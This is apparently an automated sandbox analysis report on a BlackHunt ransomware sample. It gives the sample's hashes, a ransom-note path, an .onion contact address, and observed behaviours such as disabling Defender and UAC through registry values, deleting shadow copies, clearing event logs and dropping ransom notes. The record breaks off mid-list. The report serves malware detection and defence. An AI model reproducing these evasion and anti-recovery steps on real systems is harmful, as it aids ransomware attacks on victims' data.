Analysis
-
max time kernel
15s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
18-01-2024 22:47
Static task
static1
Behavioral task
behavioral1
Sample
2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe
Resource
win10v2004-20231222-en
General
-
Target
2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe
-
Size
707KB
-
MD5
137e014b53dad521d4ef608ca4e6d3b2
-
SHA1
4c249e451d9fe520fdde0f2d4f890553e9e3e957
-
SHA256
2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c
-
SHA512
0369a9349ae9361fc1aa010e5e5db30b48360f1b63d0f001421237f74dfb478e54e08434857874cbedc7cda0be68e0306636c7d7240da7c7785ad6ed59044211
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1z8tvnh:6uaTmkZJ+naie5OTamgEoKxLWaZh
Malware Config
Extracted
C:\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 12348 fsutil.exe 11332 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 11696 wevtutil.exe 5656 wevtutil.exe 13256 wevtutil.exe 9160 wevtutil.exe 12856 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 11008 bcdedit.exe 5240 bcdedit.exe 5380 bcdedit.exe 3876 bcdedit.exe -
Renames multiple (1765) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 5344 wbadmin.exe 14540 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\G: 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File opened (read-only) \??\H: 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File opened (read-only) \??\V: 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File opened (read-only) \??\N: 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File opened (read-only) \??\M: 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File opened (read-only) \??\O: 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File opened (read-only) \??\K: 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File opened (read-only) \??\L: 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\U: 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File opened (read-only) \??\P: 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\Q: 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File opened (read-only) \??\W: 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File opened (read-only) \??\I: 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File opened (read-only) \??\Z: 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File opened (read-only) \??\B: 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File opened (read-only) \??\X: 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File opened (read-only) \??\E: 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File opened (read-only) \??\R: 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File opened (read-only) \??\T: 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File opened (read-only) \??\Y: 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File opened (read-only) \??\J: 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File opened (read-only) \??\A: 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File opened (read-only) \??\S: 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 5 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ro-ro\#BlackHunt_Private.key 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\sv-se\#BlackHunt_Private.key 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\da-dk\#BlackHunt_ReadMe.txt 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\sk-sk\#BlackHunt_ReadMe.txt 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\javafx.properties 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\vlc.mo 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\next-arrow-hover.svg 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ru-ru\ui-strings.js 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File created C:\Program Files\dotnet\swidtag\#BlackHunt_ReadMe.txt 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File opened for modification C:\Program Files\Java\jdk-1.8\lib\sa-jdi.jar 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\libs\jquery.ui.touch-punch\#BlackHunt_ReadMe.hta 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ru-ru\#BlackHunt_ReadMe.txt 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\hr-hr\#BlackHunt_ReadMe.txt 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\sl-sl\#BlackHunt_ReadMe.txt 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\da-dk\#BlackHunt_Private.key 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\plugins\rhp\editpdf-selector.js 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\hr-hr\#BlackHunt_ReadMe.txt 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File created C:\Program Files\Java\jre-1.8\lib\applet\#BlackHunt_Private.key 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File created C:\Program Files\VideoLAN\VLC\locale\ja\LC_MESSAGES\#BlackHunt_ReadMe.hta 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\core\#BlackHunt_ReadMe.hta 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\RHP_icons.png 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\S_IlluNoInternetConnection_120x80.svg 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\rhp_world_icon_hover.png 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\convertpdf-selector.js 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\cs-cz\ui-strings.js 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File created C:\Program Files\Java\jdk-1.8\#BlackHunt_Private.key 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgePackages.h 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\zh-cn\ui-strings.js 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\es-es\#BlackHunt_ReadMe.hta 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\eu-es\#BlackHunt_ReadMe.txt 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\cmm\CIEXYZ.pf 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\jpeg.md 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\plugins\#BlackHunt_Private.key 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\lcms.md 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\pkcs11cryptotoken.md 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File opened for modification C:\Program Files\VideoLAN\VLC\hrtfs\dodeca_and_7channel_3DSL_HRTF.sofa 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\tr-tr\#BlackHunt_Private.key 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\sk-sk\ui-strings.js 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File created C:\Program Files\Java\jre-1.8\legal\jdk\#BlackHunt_ReadMe.hta 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File created C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\#BlackHunt_ReadMe.hta 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\#BlackHunt_ReadMe.txt 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\files\#BlackHunt_ReadMe.txt 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_newfolder-default.svg 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\es-es\#BlackHunt_ReadMe.txt 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\javafx\jpeg_fx.md 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File created C:\Program Files\VideoLAN\VLC\plugins\gui\#BlackHunt_ReadMe.txt 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\icons_ie8.gif 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\da-dk\#BlackHunt_ReadMe.hta 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\da-dk\#BlackHunt_ReadMe.txt 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon.png 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File created C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\#BlackHunt_ReadMe.hta 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File created C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\#BlackHunt_ReadMe.txt 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File created C:\Program Files\VideoLAN\VLC\locale\en_GB\#BlackHunt_Private.key 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\#BlackHunt_ReadMe.hta 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fr-ma\ui-strings.js 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ko-kr\ui-strings.js 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\javafx\mesa3d.md 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ko-kr\ui-strings.js 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\eu-es\#BlackHunt_Private.key 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File opened for modification C:\Program Files\7-Zip\Lang\yo.txt 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account-select\js\#BlackHunt_ReadMe.hta 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sv-se\#BlackHunt_ReadMe.txt 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\en-ae\#BlackHunt_Private.key 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\relaxngom.md 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 13020 12712 WerFault.exe 296 -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 7720 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 8700 vssadmin.exe 9420 vssadmin.exe 12028 vssadmin.exe 8068 vssadmin.exe 7928 vssadmin.exe 12912 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 6024 taskkill.exe -
Modifies registry class 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4820 PING.EXE -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 4212 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe Token: SeRestorePrivilege 4212 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe Token: SeBackupPrivilege 4212 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe Token: SeTakeOwnershipPrivilege 4212 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe Token: SeAuditPrivilege 4212 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe Token: SeSecurityPrivilege 4212 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe Token: SeIncBasePriorityPrivilege 4212 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe Token: SeBackupPrivilege 5796 wbengine.exe Token: SeRestorePrivilege 5796 wbengine.exe Token: SeSecurityPrivilege 5796 wbengine.exe Token: SeBackupPrivilege 12476 vssvc.exe Token: SeRestorePrivilege 12476 vssvc.exe Token: SeAuditPrivilege 12476 vssvc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4212 wrote to memory of 2644 4212 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe 176 PID 4212 wrote to memory of 2644 4212 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe 176 PID 4212 wrote to memory of 4932 4212 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe 174 PID 4212 wrote to memory of 4932 4212 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe 174 PID 4212 wrote to memory of 3468 4212 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe 74 PID 4212 wrote to memory of 3468 4212 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe 74 PID 4212 wrote to memory of 1756 4212 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe 50 PID 4212 wrote to memory of 1756 4212 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe 50 PID 4932 wrote to memory of 3276 4932 cmd.exe 171 PID 4932 wrote to memory of 3276 4932 cmd.exe 171 PID 2644 wrote to memory of 4384 2644 cmd.exe 169 PID 2644 wrote to memory of 4384 2644 cmd.exe 169 PID 4212 wrote to memory of 2512 4212 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe 51 PID 4212 wrote to memory of 2512 4212 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe 51 PID 4212 wrote to memory of 4368 4212 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe 167 PID 4212 wrote to memory of 4368 4212 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe 167 PID 4212 wrote to memory of 1776 4212 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe 165 PID 4212 wrote to memory of 1776 4212 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe 165 PID 4212 wrote to memory of 3192 4212 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe 163 PID 4212 wrote to memory of 3192 4212 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe 163 PID 4212 wrote to memory of 1400 4212 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe 162 PID 4212 wrote to memory of 1400 4212 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe 162 PID 4212 wrote to memory of 4928 4212 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe 54 PID 4212 wrote to memory of 4928 4212 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe 54 PID 4212 wrote to memory of 3572 4212 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe 160 PID 4212 wrote to memory of 3572 4212 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe 160 PID 4212 wrote to memory of 2368 4212 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe 159 PID 4212 wrote to memory of 2368 4212 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe 159 PID 4212 wrote to memory of 4196 4212 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe 156 PID 4212 wrote to memory of 4196 4212 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe 156 PID 4212 wrote to memory of 2892 4212 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe 155 PID 4212 wrote to memory of 2892 4212 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe 155 PID 3468 wrote to memory of 4396 3468 cmd.exe 154 PID 3468 wrote to memory of 4396 3468 cmd.exe 154 PID 1756 wrote to memory of 2980 1756 cmd.exe 126 PID 1756 wrote to memory of 2980 1756 cmd.exe 126 PID 4212 wrote to memory of 2896 4212 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe 152 PID 4212 wrote to memory of 2896 4212 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe 152 PID 3192 wrote to memory of 4460 3192 cmd.exe 151 PID 3192 wrote to memory of 4460 3192 cmd.exe 151 PID 4212 wrote to memory of 1760 4212 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe 149 PID 4212 wrote to memory of 1760 4212 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe 149 PID 2512 wrote to memory of 1484 2512 cmd.exe 148 PID 2512 wrote to memory of 1484 2512 cmd.exe 148 PID 4368 wrote to memory of 1548 4368 cmd.exe 147 PID 4368 wrote to memory of 1548 4368 cmd.exe 147 PID 4212 wrote to memory of 5048 4212 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe 146 PID 4212 wrote to memory of 5048 4212 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe 146 PID 4212 wrote to memory of 2836 4212 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe 145 PID 4212 wrote to memory of 2836 4212 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe 145 PID 1760 wrote to memory of 4332 1760 cmd.exe 144 PID 1760 wrote to memory of 4332 1760 cmd.exe 144 PID 1776 wrote to memory of 4936 1776 cmd.exe 143 PID 1776 wrote to memory of 4936 1776 cmd.exe 143 PID 4212 wrote to memory of 4352 4212 